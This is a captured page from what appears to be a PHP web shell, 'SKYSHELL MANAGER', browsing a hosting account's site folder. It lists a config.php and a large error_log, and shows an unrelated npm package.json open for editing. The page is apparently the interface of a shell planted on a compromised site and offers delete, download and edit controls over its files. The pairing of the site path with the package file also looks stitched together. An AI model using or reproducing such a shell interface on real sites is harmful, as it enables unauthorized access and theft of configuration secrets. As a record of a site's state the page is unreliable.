📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuries.com
/
chb_data
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
41904.06 KB
0644
🗑️
⬇️
✏️
🔒
Editing: package.json
{ "name": "string-ts", "version": "2.2.1", "description": "Strongly-typed string functions.", "main": "./dist/index.js", "module": "./dist/index.mjs", "types": "./dist/index.d.ts", "author": "Gustavo Guichard <@gugaguichard>", "license": "MIT", "scripts": { "build": "tsup ./src/index.ts --format esm,cjs --dts --treeshake", "dev": "tsup ./src/index.ts --format esm,cjs --watch --dts", "lint": "eslint *.ts*", "tsc": "tsc --noEmit", "tsc:dist": "tsc --project tsconfig.dist.json", "test": "vitest run" }, "devDependencies": { "@typescript-eslint/eslint-plugin": "latest", "@vitest/coverage-v8": "^3.0.5", "eslint": "latest", "prettier": "latest", "tsup": "latest", "typescript": "^5.7.3", "vitest": "latest" }, "files": [ "README.md", "./dist/*" ], "repository": { "type": "git", "url": "git+https://github.com/gustavoguichard/string-ts.git" }, "bugs": { "url": "https://github.com/gustavoguichard/string-ts/issues" }, "sideEfects": false }
💾 Save Changes